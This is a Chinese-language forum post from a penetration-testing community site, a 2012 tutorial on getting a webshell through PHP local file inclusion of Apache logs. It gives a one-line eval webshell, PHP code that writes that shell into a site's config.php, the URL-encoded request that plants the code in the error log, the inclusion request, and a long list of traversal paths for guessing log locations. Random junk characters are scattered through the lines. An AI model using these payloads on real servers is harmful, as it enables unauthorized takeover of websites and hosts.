中国网络渗透测试联盟

标题: php包含apache日志写马 [打印本页]
作者: admin    时间: 2012-9-15 14:27
标题: php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
8 z6 n% ?; E0 ]0 W8 f3 [6 G; l
6 N  e* E; _! @0 w( t1 O9 N比如还是这句一句话木马
1 G. [% w# i4 J  n<?eval($_POST[cmd]);?>   
& w  e  B) S8 L7 F# y/ M
! \/ A' L- W+ h+ {8 v7 A到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, , V: N6 M' c! V4 p
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
% n0 f2 U* }$ Q* f) K
1 h! u: [' p7 G<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
! J) |# z7 \: G# l% T2 L' j) P! \fclose($fp);?>   //在config.php里写入一句木马语句 ) B0 P6 S- C& f0 s: t" [6 @, d# E1 i! i
+ w0 S; Q0 E% j+ [3 A
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 6 P. h, _# H! {9 A+ @
转换为 * E  R4 Y- T. N0 L/ w9 h
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F : i' r. z% l) j
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp 3 ?# k8 U. h# g4 r
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
# D" U7 ~& B6 Y* @! o9 Ffclose%28%24fp%29%3B%3F%3E 1 u7 d0 S% U4 R- T/ B1 o
我们提交   o8 `) o1 V0 [3 f, R! Z. P3 i2 G1 y
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
9 S/ Z7 z% h* p& f9 c1 y; X; j  d%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp ' U2 T' k" s( V
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B % ]/ y- k7 S. \" ?: L( f
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
- T6 J) T( G9 w1 y- Q5 r+ @
5 o3 O9 }% r( w- `2 x' A这样就错误日志里就记录下了这行写入webshell的代码。
. @7 u2 `$ F! O我们再来包含日志,提交
9 O6 G7 ?9 j% a# ^http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
! |4 p  l, _* u3 P- G: n. X9 a$ Y
! u! f0 H3 a8 g4 i1 a0 V- C3 [; s4 R这样webshell就写入成功了,config.php里就写入一句木马语句
9 z; ~0 h7 u  pOK.
; `( E( R) _, O, o% R7 yhttp://www.xxx.com/forum/config.php这个就成了我们的webshell ! i# m4 X9 K, Q# j- w7 s! G# x
直接用lanker的客户端一连,主机就是你的了。
# T) ?* a( n1 q0 ]/ A7 I! R7 Q$ ~6 z. O
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
9 T" v9 r6 M) L2 v( Z4 w, d9 g9 g7 L7 e* N
其他的日志路径,你可以去猜,也可以参照这里。
# [9 M& Q7 G2 ]/ G+ _../../../../../../../../../../var/log/httpd/access_log ; z: B0 Y) V' ?* @1 [" z6 P
../../../../../../../../../../var/log/httpd/error_log & l" O: b5 ]% l4 c5 c
../apache/logs/error.log ! N+ \7 b+ l) @* x$ r
../apache/logs/access.log 2 N$ J9 r5 p* ~" M6 W1 L
../../apache/logs/error.log 0 _3 W  U  u6 v
../../apache/logs/access.log
: ~+ z7 z8 R! m3 ?# m5 ?../../../apache/logs/error.log
. C4 E$ Q  s. w/ a/ |! x: h../../../apache/logs/access.log
+ T  e1 q& R; L../../../../../../../../../../etc/httpd/logs/acces_log
- @9 M9 v7 r5 \, [& @* \# z../../../../../../../../../../etc/httpd/logs/acces.log
" W5 T* z8 N: H. L8 s# j../../../../../../../../../../etc/httpd/logs/error_log * x" Y8 d6 ~. V0 F
../../../../../../../../../../etc/httpd/logs/error.log . h- G$ g6 X9 |. a$ n: D5 W
../../../../../../../../../../var/www/logs/access_log * l3 ^& X0 s) a, ]: `+ m3 Q% A4 m
../../../../../../../../../../var/www/logs/access.log
# r/ H$ Y$ p8 i7 a( @& a0 q  m; p../../../../../../../../../../usr/local/apache/logs/access_log 8 Q( {, k5 r! B
../../../../../../../../../../usr/local/apache/logs/access.log
0 q9 o( J. G% Q! |- e../../../../../../../../../../var/log/apache/access_log * z) r! D/ X* ~( i3 ~
../../../../../../../../../../var/log/apache/access.log 4 u; D3 Z* ?- t- d: i# @
../../../../../../../../../../var/log/access_log
$ k9 m9 I8 a( X" B: T& q9 K9 r- ?../../../../../../../../../../var/www/logs/error_log , x+ `5 P  G' N
../../../../../../../../../../var/www/logs/error.log / q! S# E2 l$ Q; f. Q" F
../../../../../../../../../../usr/local/apache/logs/error_log 3 T% u) z' B8 Z3 d7 I
../../../../../../../../../../usr/local/apache/logs/error.log
6 m" Z" z$ ?8 U  R: Y& _: x../../../../../../../../../../var/log/apache/error_log
# t+ G; y# _$ I" A: _../../../../../../../../../../var/log/apache/error.log 2 k, j/ ^' ^2 j' I% H. E4 D
../../../../../../../../../../var/log/access_log
0 v/ L0 u" ^$ S/ F. ^9 O../../../../../../../../../../var/log/error_log ! d: [6 n! N  u% X
/var/log/httpd/access_log      
* U: S+ ?& h+ ~: M! L/var/log/httpd/error_log     7 p5 Z: z5 z% t5 Z: G; r- S# z
../apache/logs/error.log     
: W+ m! H9 M- Q../apache/logs/access.log ( B3 B9 }8 b0 A
../../apache/logs/error.log 2 Q8 M$ f+ h. L3 M- Z8 y) h  J
../../apache/logs/access.log
% W2 `" l- H) Y8 t../../../apache/logs/error.log
/ `5 y0 Q& M+ l../../../apache/logs/access.log / [' o; X% u5 u' t" m6 _
/etc/httpd/logs/acces_log - W% G. U- W$ h8 h" F
/etc/httpd/logs/acces.log
' C* ~0 F% `& n' z1 R/etc/httpd/logs/error_log
2 H4 p- ^4 y! \/etc/httpd/logs/error.log 3 V( u- l3 X1 b
/var/www/logs/access_log 8 g# G  ^  T4 L1 X+ @6 L
/var/www/logs/access.log
* ^& P" N0 _3 m3 M% ?6 D; _* c/usr/local/apache/logs/access_log
1 P$ R+ K3 O9 g; S1 v& N: K2 n/usr/local/apache/logs/access.log
+ g* l% p: C  S% [+ |! @  n' S/ t/var/log/apache/access_log / A' J3 e& ]5 R$ ]# I4 |3 t" [/ {. I$ p
/var/log/apache/access.log ( s) I$ |/ I, Z9 W6 V7 r* b* F
/var/log/access_log 4 o) [, M) w3 A: _! X; Q
/var/www/logs/error_log 2 o  F3 b6 {$ X/ n$ ^  \
/var/www/logs/error.log ; [- q- Z9 M# l  {
/usr/local/apache/logs/error_log 6 l, ^) l8 m: ~+ P" G  q
/usr/local/apache/logs/error.log
4 I1 F! A  x1 |+ V: ^' @% l; u' f/var/log/apache/error_log ' q1 ?6 f1 F' p7 Y: v% v6 F4 e  _
/var/log/apache/error.log
9 I, X! ]3 G' x6 [" \/var/log/access_log   N+ B! s4 Q& s3 N7 ?( ]! S0 `3 n
/var/log/error_log



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2